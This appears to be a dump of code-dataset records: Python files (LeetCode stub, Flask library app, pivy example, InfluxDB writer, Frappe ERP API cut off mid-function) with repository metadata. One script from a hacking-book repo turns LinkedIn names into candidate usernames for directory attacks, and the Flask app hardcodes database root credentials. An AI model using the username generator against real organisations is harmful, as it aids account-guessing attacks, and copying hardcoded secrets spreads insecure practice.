hexsha: string
size: int64
ext: string
lang: string
max_stars_repo_path: string
max_stars_repo_name: string
max_stars_repo_head_hexsha: string
max_stars_repo_licenses: list
max_stars_count: int64
max_stars_repo_stars_event_min_datetime: string
max_stars_repo_stars_event_max_datetime: string
max_issues_repo_path: string
max_issues_repo_name: string
max_issues_repo_head_hexsha: string
max_issues_repo_licenses: list
max_issues_count: int64
max_issues_repo_issues_event_min_datetime: string
max_issues_repo_issues_event_max_datetime: string
max_forks_repo_path: string
max_forks_repo_name: string
max_forks_repo_head_hexsha: string
max_forks_repo_licenses: list
max_forks_count: int64
max_forks_repo_forks_event_min_datetime: string
max_forks_repo_forks_event_max_datetime: string
content: string
avg_line_length: float64
max_line_length: int64
alphanum_fraction: float64
qsc_code_num_words_quality_signal: int64
qsc_code_num_chars_quality_signal: float64
qsc_code_mean_word_length_quality_signal: float64
qsc_code_frac_words_unique_quality_signal: float64
qsc_code_frac_chars_top_2grams_quality_signal: float64
qsc_code_frac_chars_top_3grams_quality_signal: float64
qsc_code_frac_chars_top_4grams_quality_signal: float64
qsc_code_frac_chars_dupe_5grams_quality_signal: float64
qsc_code_frac_chars_dupe_6grams_quality_signal: float64
qsc_code_frac_chars_dupe_7grams_quality_signal: float64
qsc_code_frac_chars_dupe_8grams_quality_signal: float64
qsc_code_frac_chars_dupe_9grams_quality_signal: float64
qsc_code_frac_chars_dupe_10grams_quality_signal: float64
qsc_code_frac_chars_replacement_symbols_quality_signal: float64
qsc_code_frac_chars_digital_quality_signal: float64
qsc_code_frac_chars_whitespace_quality_signal: float64
qsc_code_size_file_byte_quality_signal: float64
qsc_code_num_lines_quality_signal: float64
qsc_code_num_chars_line_max_quality_signal: float64
qsc_code_num_chars_line_mean_quality_signal: float64
qsc_code_frac_chars_alphabet_quality_signal: float64
qsc_code_frac_chars_comments_quality_signal: float64
qsc_code_cate_xml_start_quality_signal: float64
qsc_code_frac_lines_dupe_lines_quality_signal: float64
qsc_code_cate_autogen_quality_signal: float64
qsc_code_frac_lines_long_string_quality_signal: float64
qsc_code_frac_chars_string_length_quality_signal: float64
qsc_code_frac_chars_long_word_length_quality_signal: float64
qsc_code_frac_lines_string_concat_quality_signal: float64
qsc_code_cate_encoded_data_quality_signal: float64
qsc_code_frac_chars_hex_words_quality_signal: float64
qsc_code_frac_lines_prompt_comments_quality_signal: float64
qsc_code_frac_lines_assert_quality_signal: float64
qsc_codepython_cate_ast_quality_signal: float64
qsc_codepython_frac_lines_func_ratio_quality_signal: float64
qsc_codepython_cate_var_zero_quality_signal: bool
qsc_codepython_frac_lines_pass_quality_signal: float64
qsc_codepython_frac_lines_import_quality_signal: float64
qsc_codepython_frac_lines_simplefunc_quality_signal: float64
qsc_codepython_score_lines_no_logic_quality_signal: float64
qsc_codepython_frac_lines_print_quality_signal: float64
qsc_code_num_words: int64
qsc_code_num_chars: int64
qsc_code_mean_word_length: int64
qsc_code_frac_words_unique: null
qsc_code_frac_chars_top_2grams: int64
qsc_code_frac_chars_top_3grams: int64
qsc_code_frac_chars_top_4grams: int64
qsc_code_frac_chars_dupe_5grams: int64
qsc_code_frac_chars_dupe_6grams: int64
qsc_code_frac_chars_dupe_7grams: int64
qsc_code_frac_chars_dupe_8grams: int64
qsc_code_frac_chars_dupe_9grams: int64
qsc_code_frac_chars_dupe_10grams: int64
qsc_code_frac_chars_replacement_symbols: int64
qsc_code_frac_chars_digital: int64
qsc_code_frac_chars_whitespace: int64
qsc_code_size_file_byte: int64
qsc_code_num_lines: int64
qsc_code_num_chars_line_max: int64
qsc_code_num_chars_line_mean: int64
qsc_code_frac_chars_alphabet: int64
qsc_code_frac_chars_comments: int64
qsc_code_cate_xml_start: int64
qsc_code_frac_lines_dupe_lines: int64
qsc_code_cate_autogen: int64
qsc_code_frac_lines_long_string: int64
qsc_code_frac_chars_string_length: int64
qsc_code_frac_chars_long_word_length: int64
qsc_code_frac_lines_string_concat: null
qsc_code_cate_encoded_data: int64
qsc_code_frac_chars_hex_words: int64
qsc_code_frac_lines_prompt_comments: int64
qsc_code_frac_lines_assert: int64
qsc_codepython_cate_ast: int64
qsc_codepython_frac_lines_func_ratio: int64
qsc_codepython_cate_var_zero: int64
qsc_codepython_frac_lines_pass: int64
qsc_codepython_frac_lines_import: int64
qsc_codepython_frac_lines_simplefunc: int64
qsc_codepython_score_lines_no_logic: int64
qsc_codepython_frac_lines_print: int64
effective: string
hits: int64
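The pairs above are the per-record column schema: 25 repository-metadata columns, the raw source file in content, and the qsc_* quality-signal columns used for filtering. As a minimal sketch of how records with this schema might be consumed (the dataset path below is a placeholder, not given in this dump; load_dataset is the Hugging Face datasets loader):

from datasets import load_dataset

# Placeholder path: the real dataset name does not appear in this dump.
ds = load_dataset("some-org/python-code-subset", split="train", streaming=True)

for record in ds:
    # "content" holds the raw source file; the qsc_* columns are
    # precomputed quality signals usable for filtering.
    if record["alphanum_fraction"] > 0.5 and \
            record["qsc_code_frac_lines_dupe_lines_quality_signal"] < 0.1:
        print(record["max_stars_repo_name"], record["size"])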
8209e6f9baf6dc11c2faf5266f9168821f205e98
2,243
py
Python
medium/python/c0335_731_my-calendar-ii/00_leetcode_0335.py
drunkwater/leetcode
8cc4a07763e71efbaedb523015f0c1eff2927f60
[ "Ruby" ]
null
null
null
medium/python/c0335_731_my-calendar-ii/00_leetcode_0335.py
drunkwater/leetcode
8cc4a07763e71efbaedb523015f0c1eff2927f60
[ "Ruby" ]
null
null
null
medium/python/c0335_731_my-calendar-ii/00_leetcode_0335.py
drunkwater/leetcode
8cc4a07763e71efbaedb523015f0c1eff2927f60
[ "Ruby" ]
3
2018-02-09T02:46:48.000Z
2021-02-20T08:32:03.000Z
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#731. My Calendar II
#Implement a MyCalendarTwo class to store your events. A new event can be added if adding the event will not cause a triple booking.
#Your class will have one method, book(int start, int end). Formally, this represents a booking on the half open interval [start, end), the range of real numbers x such that start <= x < end.
#A triple booking happens when three events have some non-empty intersection (ie., there is some time that is common to all 3 events.)
#For each call to the method MyCalendar.book, return true if the event can be added to the calendar successfully without causing a triple booking. Otherwise, return false and do not add the event to the calendar.
#Your class will be called like this: MyCalendar cal = new MyCalendar(); MyCalendar.book(start, end)
#Example 1:
#MyCalendar();
#MyCalendar.book(10, 20); // returns true
#MyCalendar.book(50, 60); // returns true
#MyCalendar.book(10, 40); // returns true
#MyCalendar.book(5, 15); // returns false
#MyCalendar.book(5, 10); // returns true
#MyCalendar.book(25, 55); // returns true
#Explanation:
#The first two events can be booked. The third event can be double booked.
#The fourth event (5, 15) can't be booked, because it would result in a triple booking.
#The fifth event (5, 10) can be booked, as it does not use time 10 which is already double booked.
#The sixth event (25, 55) can be booked, as the time in [25, 40) will be double booked with the third event;
#the time [40, 50) will be single booked, and the time [50, 55) will be double booked with the second event.
#Note:
#The number of calls to MyCalendar.book per test case will be at most 1000.
#In calls to MyCalendar.book(start, end), start and end are integers in the range [0, 10^9].
#class MyCalendarTwo(object):
#    def __init__(self):
#    def book(self, start, end):
#        """
#        :type start: int
#        :type end: int
#        :rtype: bool
#        """
## Your MyCalendarTwo object will be instantiated and called as such:
## obj = MyCalendarTwo()
## param_1 = obj.book(start,end)
# Time Is Money
54.707317
212
0.728043
367
2,243
4.435967
0.39782
0.085995
0.034398
0.061425
0.030713
0.030713
0
0
0
0
0
0.03268
0.181453
2,243
41
213
54.707317
0.854031
0.963442
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
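The MyCalendarTwo stub in the record above was never implemented. For orientation, a minimal boundary-counting sketch of what the description asks for (my own illustration, not part of the stored file; only the class name and the book() signature come from the record):

# Hypothetical solution sketch; not part of the dataset record.
class MyCalendarTwo(object):
    def __init__(self):
        # boundary point -> net change in number of concurrent events
        self.deltas = {}

    def book(self, start, end):
        # Tentatively book the half-open interval [start, end).
        self.deltas[start] = self.deltas.get(start, 0) + 1
        self.deltas[end] = self.deltas.get(end, 0) - 1
        # Sweep the boundaries in order; a running count of 3 or more
        # means some instant is covered by three events.
        active = 0
        for point in sorted(self.deltas):
            active += self.deltas[point]
            if active >= 3:
                # Triple booking: roll the tentative event back.
                self.deltas[start] -= 1
                self.deltas[end] += 1
                return False
        return True

Run against Example 1 in the record (book(10, 20) through book(25, 55)), this returns True, True, True, False, True, True, matching the expected outputs in the description.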
820b086050ad75315e1b8b3a7bb8f87684d23be9
173
py
Python
main.py
ichir0roie/mangaSeeFeeder
9871cb079a4c180ce2167b5aa60c48c9423822fe
[ "MIT" ]
1
2021-09-07T14:13:35.000Z
2021-09-07T14:13:35.000Z
main.py
ichir0roie/mangaSeeFeeder
9871cb079a4c180ce2167b5aa60c48c9423822fe
[ "MIT" ]
null
null
null
main.py
ichir0roie/mangaSeeFeeder
9871cb079a4c180ce2167b5aa60c48c9423822fe
[ "MIT" ]
null
null
null
import myPkgs.Scraper

# scraping data and save pickle
scraper=myPkgs.Scraper.Scraper()
scraper.setSubscriptionsPage()
scraper.getInfoFromSubScriptions()

# create mailHtml
19.222222
34
0.82659
18
173
7.944444
0.666667
0.181818
0
0
0
0
0
0
0
0
0
0
0.092486
173
9
35
19.222222
0.910828
0.260116
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
820ca3e67bffef370d9d41988b414444b2ad1bf8
2,968
py
Python
examples/Mentor/05.6.TransformOrdering.py
cclauss/pivy
55de2ba4dd32f62ce2d4e33ca28459cf3ea5167a
[ "ISC" ]
29
2019-12-28T10:37:16.000Z
2022-02-09T10:48:04.000Z
examples/Mentor/05.6.TransformOrdering.py
cclauss/pivy
55de2ba4dd32f62ce2d4e33ca28459cf3ea5167a
[ "ISC" ]
29
2019-12-26T13:46:11.000Z
2022-03-29T18:14:33.000Z
examples/Mentor/05.6.TransformOrdering.py
cclauss/pivy
55de2ba4dd32f62ce2d4e33ca28459cf3ea5167a
[ "ISC" ]
17
2019-12-29T11:49:32.000Z
2022-02-23T00:28:18.000Z
#!/usr/bin/env python

###
# Copyright (c) 2002-2007 Systems in Motion
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
###

# This is an example from the Inventor Mentor,
# chapter 5, example 6.
#
# This example shows the effect of different order of
# operation of transforms. The left object is first
# scaled, then rotated, and finally translated to the left.
# The right object is first rotated, then scaled, and finally
# translated to the right.
#

import sys

from pivy.coin import *
from pivy.sogui import *

def main():
    # Initialize Inventor and Qt
    myWindow = SoGui.init(sys.argv[0])
    if myWindow == None:
        sys.exit(1)

    root = SoSeparator()

    # Create two separators, for left and right objects.
    leftSep = SoSeparator()
    rightSep = SoSeparator()
    root.addChild(leftSep)
    root.addChild(rightSep)

    # Create the transformation nodes
    leftTranslation = SoTranslation()
    rightTranslation = SoTranslation()
    myRotation = SoRotationXYZ()
    myScale = SoScale()

    # Fill in the values
    leftTranslation.translation = (-1.0, 0.0, 0.0)
    rightTranslation.translation = (1.0, 0.0, 0.0)
    myRotation.angle = M_PI/2  # 90 degrees
    myRotation.axis = SoRotationXYZ.X
    myScale.scaleFactor = (2., 1., 3.)

    # Add transforms to the scene.
    leftSep.addChild(leftTranslation)    # left graph
    leftSep.addChild(myRotation)         # then rotated
    leftSep.addChild(myScale)            # first scaled

    rightSep.addChild(rightTranslation)  # right graph
    rightSep.addChild(myScale)           # then scaled
    rightSep.addChild(myRotation)        # first rotated

    # Read an object from file. (as in example 4.2.Lights)
    myInput = SoInput()
    if not myInput.openFile("temple.iv"):
        sys.exit(1)
    fileContents = SoDB.readAll(myInput)
    if fileContents == None:
        sys.exit(1)

    # Add an instance of the object under each separator.
    leftSep.addChild(fileContents)
    rightSep.addChild(fileContents)

    # Construct a renderArea and display the scene.
    myViewer = SoGuiExaminerViewer(myWindow)
    myViewer.setSceneGraph(root)
    myViewer.setTitle("Transform Ordering")
    myViewer.show()
    myViewer.viewAll()

    SoGui.show(myWindow)
    SoGui.mainLoop()

if __name__ == "__main__":
    main()
31.242105
74
0.705863
382
2,968
5.460733
0.465969
0.00767
0.008629
0.00767
0.040268
0.016299
0.016299
0
0
0
0
0.014524
0.211253
2,968
94
75
31.574468
0.876548
0.493598
0
0.046512
0
0
0.024005
0
0
0
0
0
0
1
0.023256
false
0
0.069767
0
0.093023
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
820ceb9164fe0c747e5f68b273d1654107a1cd1d
1,796
py
Python
python-object-storage/test_object_storage.py
henriqueccapozzi/pocs
9c1e3b22b3f026b22fe01b365bddd95b5afc9264
[ "MIT" ]
null
null
null
python-object-storage/test_object_storage.py
henriqueccapozzi/pocs
9c1e3b22b3f026b22fe01b365bddd95b5afc9264
[ "MIT" ]
null
null
null
python-object-storage/test_object_storage.py
henriqueccapozzi/pocs
9c1e3b22b3f026b22fe01b365bddd95b5afc9264
[ "MIT" ]
null
null
null
import os
import json

import pytest

from object_storage import DB

DB_FILE_NAME = "db.json"

def _create_test_db():
    return DB("test", file_name=DB_FILE_NAME)

def _create_mock_obj():
    return {
        "programing_languages_features": {
            "python": ["simple", "easy setup"],
            "javascript": ["widespread usage", "powerfull"],
        }
    }

class TestAtributes(object):
    def test_db_have_name(self):
        new_db = _create_test_db()
        assert new_db.name == "test"

    def test_insert_retrieve_objects(self):
        new_db = _create_test_db()

        new_db.insert(key="topic", value="registration")
        assert new_db.get("topic") == "registration"

        color_list = ["blue", "red", "green"]
        new_db.insert("color_list", color_list)
        assert new_db.get("color_list") == color_list

        new_db.insert("number", 9)
        assert new_db.get("number") == 9

        obj = _create_mock_obj()
        new_db.insert("languages", obj)
        assert new_db.get("languages") == obj

    def test_db_saves_to_file(self):
        new_db = _create_test_db()
        obj = _create_mock_obj()
        new_db.insert("languages", obj)
        new_db.save()
        assert os.stat("db.json") is not None

    def test_db_saves_proper_data_to_file(self):
        new_db = _create_test_db()
        obj = _create_mock_obj()
        new_db.insert("languages", obj)
        new_db.save()
        with open(DB_FILE_NAME, "r") as f:
            loaded_obj = json.load(f)
        assert loaded_obj == new_db.objects

    def test_db_loads_from_file(self):
        new_db = _create_test_db()
        new_db.insert("number", 1)
        new_db.save()
        loaded_db = DB("test", DB_FILE_NAME, True)
        assert loaded_db.objects == {"number": 1}
26.80597
60
0.614143
244
1,796
4.143443
0.27459
0.103858
0.076162
0.074184
0.274975
0.274975
0.254204
0.250247
0.250247
0.148368
0
0.003019
0.262249
1,796
67
61
26.80597
0.76
0
0
0.28
0
0
0.132999
0.016138
0
0
0
0
0.16
1
0.14
false
0
0.08
0.04
0.28
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
820f6292ce69f024eb8b287f0493082d26ff31c3
3,898
py
Python
10-Flask/72-Library.py
ericson14/Small_project
dd88b9a5619d38fb8d236c932ffa8429d24b28ae
[ "MIT" ]
null
null
null
10-Flask/72-Library.py
ericson14/Small_project
dd88b9a5619d38fb8d236c932ffa8429d24b28ae
[ "MIT" ]
null
null
null
10-Flask/72-Library.py
ericson14/Small_project
dd88b9a5619d38fb8d236c932ffa8429d24b28ae
[ "MIT" ]
null
null
null
from flask import Flask, flash, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField

class Config(object):
    SQLALCHEMY_DATABASE_URI = "mysql://root:chuanzhi@127.0.0.1:3306/library"
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SECRET_KEY = "a13uo1ccl"

class Register(FlaskForm):
    author = StringField("作者", render_kw={"placeholder": "添加作者"})
    book = StringField("书名", render_kw={"placeholder": "添加书名"})
    submit = SubmitField("添加")

app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)

class Author(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(15), nullable=False)
    books = db.relation("Book", backref="author")

    def __repr__(self):
        return "Author: {} {}".format(self.name, self.id)

class Book(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(30), nullable=False)
    author_id = db.Column(db.Integer, db.ForeignKey(Author.id))

    def __repr__(self):
        return "Book: {} {}".format(self.name, self.id)

@app.route('/', methods=['GET', 'POST'])
def index():
    form = Register()
    if request.method == "POST":
        if form.validate_on_submit():
            author_name = request.form.get("author")
            book_name = request.form.get("book")
            author = Author.query.filter(Author.name == author_name).first()
            if author:
                # author already exists, only add the book
                book = Book.query.filter(Book.name == book_name).first()
                if book:
                    flash("已经有此书了,请勿重复添加")
                else:
                    new_book = Book(name=book_name, author_id=author.id)
                    db.session.add(new_book)
                    db.session.commit()
            else:
                # no such author: add the author first, then the book
                new_author = Author(name=author_name)
                db.session.add(new_author)
                db.session.commit()
                new_book = Book(name=book_name, author_id=new_author.id)
                db.session.add(new_book)
                db.session.commit()
        else:
            flash("参数错误")
    authors = Author.query.all()
    return render_template("temp4_72.html", form=form, authors=authors)

@app.route('/del_book/<book_id>')
def del_book(book_id):
    delbook = Book.query.get(book_id)
    if delbook:
        try:
            db.session.delete(delbook)
        except Exception as e:
            flash(e)
            db.session.rollback()
        finally:
            db.session.commit()
    else:
        flash("书名不存在。。。")
    return redirect(url_for("index"))

@app.route('/del_author/<author_id>')
def del_author(author_id):
    delauthor = Author.query.get(author_id)
    if delauthor:
        # deleting an author requires deleting all of their books first
        books = Book.query.filter(author_id == Book.author_id)
        try:
            for book in books:
                db.session.delete(book)
            db.session.delete(delauthor)
        except Exception as e:
            flash(e)
            db.session.rollback()
        finally:
            db.session.commit()
    else:
        flash("作者不存在。。。")
    return redirect(url_for("index"))

if __name__ == "__main__":
    db.drop_all()
    # create all tables
    db.create_all()
    # generate seed data
    au1 = Author(name='老王')
    au2 = Author(name='老尹')
    au3 = Author(name='老刘')
    # commit the data to the session
    db.session.add_all([au1, au2, au3])
    db.session.commit()
    bk1 = Book(name='老王回忆录', author_id=au1.id)
    bk2 = Book(name='我读书少,你别骗我', author_id=au1.id)
    bk3 = Book(name='如何才能让自己更骚', author_id=au2.id)
    bk4 = Book(name='怎样征服美丽少女', author_id=au3.id)
    bk5 = Book(name='如何征服英俊少男', author_id=au3.id)
    # commit the data to the session
    db.session.add_all([bk1, bk2, bk3, bk4, bk5])
    # commit the session
    db.session.commit()
    app.run(debug=True)
29.755725
76
0.596203
484
3,898
4.640496
0.285124
0.068121
0.04675
0.033838
0.259127
0.186109
0.186109
0.186109
0.158504
0.158504
0
0.014371
0.268086
3,898
130
77
29.984615
0.772871
0.02001
0
0.29703
0
0
0.07767
0.017581
0
0
0
0
0
1
0.049505
false
0
0.039604
0.019802
0.29703
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
820fc8eb5d725ac75d1fc9754e8b1b1fc09bf771
404
py
Python
pycats/tests/instances/test_set_inst.py
kykosic/pycats
43b317fcd7a30c95c0b92990b042904f2c338870
[ "Apache-2.0" ]
5
2020-06-12T23:08:28.000Z
2021-09-09T09:18:41.000Z
pycats/tests/instances/test_set_inst.py
kykosic/pycats
43b317fcd7a30c95c0b92990b042904f2c338870
[ "Apache-2.0" ]
1
2020-02-08T20:07:09.000Z
2020-02-08T20:07:09.000Z
pycats/tests/instances/test_set_inst.py
kykosic/pycats
43b317fcd7a30c95c0b92990b042904f2c338870
[ "Apache-2.0" ]
null
null
null
import pycats.instances  # noqa: F401

def test_semigroup():
    a = {1, 2}
    b = {2, 4}
    actual = a.combine(b)
    expected = {1, 2, 4}
    assert actual == expected

def test_monoid():
    actual = list.unit()
    expected = list()
    assert actual == expected

def test_functor():
    a = {1, 2, 3}
    actual = a.map(lambda x: x + 2)
    expected = {3, 4, 5}
    assert actual == expected
16.16
37
0.561881
57
404
3.929825
0.45614
0.09375
0.267857
0.205357
0.241071
0
0
0
0
0
0
0.059649
0.294554
404
24
38
16.833333
0.726316
0.024752
0
0.1875
0
0
0
0
0
0
0
0
0.1875
1
0.1875
false
0
0.0625
0
0.25
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
8210337a295e13c410889ae84e0363248842ff40
582
py
Python
Chapter04/name2ldap.py
PacktPublishing/Becming-the-Hacker
90eb5bc093d4b6a4b171e1d4cb0170bc23746846
[ "MIT" ]
27
2019-02-13T16:28:44.000Z
2021-12-16T09:53:36.000Z
Chapter04/name2ldap.py
mirroR72/Becoming-the-Hacker
57093174a107f5ea3abc35bcd3d8267f9448afbb
[ "MIT" ]
1
2019-09-14T18:15:02.000Z
2019-09-14T18:15:02.000Z
Chapter04/name2ldap.py
mirroR72/Becoming-the-Hacker
57093174a107f5ea3abc35bcd3d8267f9448afbb
[ "MIT" ]
17
2019-01-31T10:46:09.000Z
2021-12-16T23:37:27.000Z
with open("linkedin.txt", "r") as fp: for name in iter(fp): first, last = name.strip().lower().split(" ") print first + "." + last # david.lightman print first + last # davidlightman fl = first[0] + last lf = last + first[0] print fl # dlightman print lf # lightmand print fl[:8] # dlightma print fl[:7] + "2" # dlightm2 print fl[:7] + "3" # dlightm2 print lf[:8] # davidlig print lf[:7] + "2" # davidli2 print lf[:7] + "3" # davidli3
30.631579
54
0.475945
69
582
4.014493
0.492754
0.101083
0.101083
0
0
0
0
0
0
0
0
0.044818
0.386598
582
18
55
32.333333
0.731092
0.175258
0
0
0
0
0.042129
0
0
0
0
0
0
0
null
null
0
0
null
null
0.666667
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
2
8211154aa4a5a84d14ec8e9f4d95147e8b41f6f1
3,038
py
Python
scripts/write_to_influxdb.py
sync-or-swim/sos-journaler
f98897b47a8025e74fae4b427af95e07363a64c8
[ "MIT" ]
null
null
null
scripts/write_to_influxdb.py
sync-or-swim/sos-journaler
f98897b47a8025e74fae4b427af95e07363a64c8
[ "MIT" ]
27
2020-01-29T05:50:52.000Z
2020-12-20T04:53:01.000Z
scripts/write_to_influxdb.py
BryceBeagle/sync-or-swim
f98897b47a8025e74fae4b427af95e07363a64c8
[ "MIT" ]
null
null
null
from argparse import ArgumentParser

from influxdb import InfluxDBClient

import datetime
import geohash

def main():
    parser = ArgumentParser(
        description="Writes some example FIXM data to InfluxDB")
    parser.add_argument("--hostname", type=str, default="localhost",
                        help="The hostname of InfluxDB")
    parser.add_argument("--port", type=int, default=8086,
                        help="The port to connect to InfluxDB on")
    parser.add_argument("--username", type=str, default="root",
                        help="The username to authenticate with InfluxDB")
    parser.add_argument("--password", type=str, default="root",
                        help="The password to authenticate with InfluxDB")
    parser.add_argument("--database", type=str, default="fixm",
                        help="The name of the database to write to")
    args = parser.parse_args()

    client = InfluxDBClient(args.hostname, args.port, args.username,
                            args.password, args.database)
    client.create_database(args.database)

    latitude = 33.626675
    longitude = -112.1024746
    current_time = datetime.datetime.now()

    for i in range(10):
        # Generate a Geohash given the coordinates of the aircraft. A geohash
        # allows us to do a "fuzzy search" of all aircraft within the same
        # grid cell. As the geohash precision increases, the size of the grid
        # cells become smaller. I chose 4 here because that allows for a
        # precision of +/- 20 km. That's the closest precision we can get to
        # 9 km, which I think is the closest airplanes are allowed to fly to
        # each other based on a quick search.
        ghash = geohash.encode(latitude, longitude, precision=4)

        # A point is a single row of data in a measurement
        points = [
            {
                # The measurement is analogous to a table in SQL. It's the
                # type of data we're writing.
                "measurement": "location",
                # Tags are fields of the point that are indexed. They're the
                # data we expect to look points up by.
                "tags": {
                    "centre": "ZLA",
                    "flight_number": "N1220W",
                    "geohash": ghash,
                },
                # Time is the time that this point was recorded at
                "time": current_time.isoformat(),
                # Fields are like SQL fields, but unlike tags they are not
                # indexed. This is where the real meat and potatoes of data
                # goes.
                "fields": {
                    "latitude": latitude,
                    "longitude": longitude,
                },
            },
        ]
        client.write_points(points)

        latitude += 0.01
        current_time += datetime.timedelta(0, 1)

    result = client.query("SELECT * FROM location")
    print(f"Result: {result}")

if __name__ == "__main__":
    main()
38.455696
77
0.571099
355
3,038
4.830986
0.442254
0.026239
0.049563
0.058309
0.0793
0.0793
0.050146
0
0
0
0
0.019057
0.343647
3,038
78
78
38.948718
0.841023
0.274194
0
0
0
0
0.190585
0
0
0
0
0
0
1
0.020408
false
0.061224
0.081633
0
0.102041
0.020408
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
8211444c1809530cc0c344f0e30b5c1c9a1ff78e
24,908
py
Python
totall/api.py
dacosta2213/totall
c64420bb8d35ccf423fe8ea66321b34431f79660
[ "MIT" ]
null
null
null
totall/api.py
dacosta2213/totall
c64420bb8d35ccf423fe8ea66321b34431f79660
[ "MIT" ]
null
null
null
totall/api.py
dacosta2213/totall
c64420bb8d35ccf423fe8ea66321b34431f79660
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import frappe
import json
from frappe import _
from frappe.utils import get_fullname, get_link_to_form, get_url_to_form
from datetime import date, datetime, timedelta
import jwt
import time

@frappe.whitelist()
def inventario(item_code):
    inventario = frappe.get_all('Bin',
        filters={'item_code': item_code},
        fields=['warehouse', 'actual_qty']
    )
    frappe.errprint(inventario)
    return(inventario)

@frappe.whitelist()
def pings():
    return 'pong'

def pingo():
    return 'pongo'

# RG - Update the atrasado (overdue) and factura fields on each customer
# 1 - When a Payment Entry is finalized, all customers are updated... We start by computing the date in update_atrasado
# 2 - Freeze (congelado = 1, credit_limit = 1) those more than 40 days overdue, and unfreeze (congelado = 0, credit_limit = ) those under 40
# 3 - If no SINV == "Unpaid" or "Overdue" exists, set atrasado = 0
@frappe.whitelist()
def update_atrasado():
    clientes = frappe.db.get_list('Customer', fields=['name'])
    for c in clientes:
        facturas = frappe.db.get_list('Sales Invoice',
            filters={'outstanding_amount': ['>', 1], 'customer': c.name, 'clave': ['like', '%%CC%%']},
            fields=['name', 'outstanding_amount', 'posting_date'],
            order_by='posting_date asc',
            page_length=1,
            as_list=True
        )
        if facturas:
            today = date.today()
            someday = facturas[0][2]
            diff = today - someday
            #frappe.errprint(diff.days)
            #frappe.errprint(facturas[0][0])
            #frappe.errprint(c.name)
            if diff.days > 40:
                frappe.db.sql("UPDATE tabCustomer set congelado = 1 ,credit_limit = 1 WHERE name = %s", (c.name))
                frappe.errprint(c.name)
                frappe.db.sql("UPDATE `tabSales Invoice` a left join tabCustomer b on a.customer = b.customer_name set congelado = 1, credit_limit = 1, b.atrasado = %s, b.factura = %s WHERE b.name = %s", (diff.days, facturas[0][0], c.name))
                frappe.db.commit()
            #else:
            #    frappe.db.sql("UPDATE tabCustomer SET congelado = 0 ,credit_limit = 0 WHERE name = %s", (c.name))
            #    frappe.db.commit()
    return

# @frappe.whitelist()
# def ubicacion():
#     items = frappe.db.get_list('Item', fields=['name', 'rack', 'ubicacion'])
#     for c in items:
#         ajustes = frappe.db.get_list('Stock Reconciliation Item', fields=['name', 'item_code', 'anaquel', 'ubicacion'], order_by='creation desc')
#         for a in ajustes:
#             if c.ubicacion != a.rack:
#                 #frappe.errprint(c.name)
#                 frappe.errprint(a.anaquel)
#                 frappe.db.commit()
#             #else /* : */
#             #    frappe.db.sql("UPDATE tabCustomer SET congelado = 0 ,credit_limit = 0 WHERE name = %s", (c.name))
#             #    frappe.db.commit()
#     return
#
# @frappe.whitelist()
# def ruta(login_manager):
#     ruta = frappe.db.get_value("User", login_manager.user, "ruta_login")
#     frappe.errprint(ruta)
#     frappe.local.response["home_page"] = ruta

# {"type":"Feature","properties":{},"geometry":{"type":"LineString","coordinates":[ [-118.383197,32.649782],[-115.382042,32.650772],[-115.380479,32.649689] ] }}]}"
@frappe.whitelist(allow_guest=True)  # loads the route records, filters by user and date, and sends a feature collection to the front end
def get_rutas(user, date):
    rutas = frappe.get_all('Ruta',
        fields=['cliente', 'nombre_prospecto', 'lat', 'lng', 'creation', 'comentario'],
        filters={'usuario': user, 'date': date},
        order_by='creation'
    )
    frappe.errprint(rutas)
    feature = """ { "type": "FeatureCollection" , "features":[ { "type" : "Feature","properties":{},"geometry":{"type":"LineString","coordinates": [ """
    for i in rutas:
        feature += """ [ """ + str(i.lng) + """,""" + str(i.lat) + """ ] """
        if i == rutas[-1]:
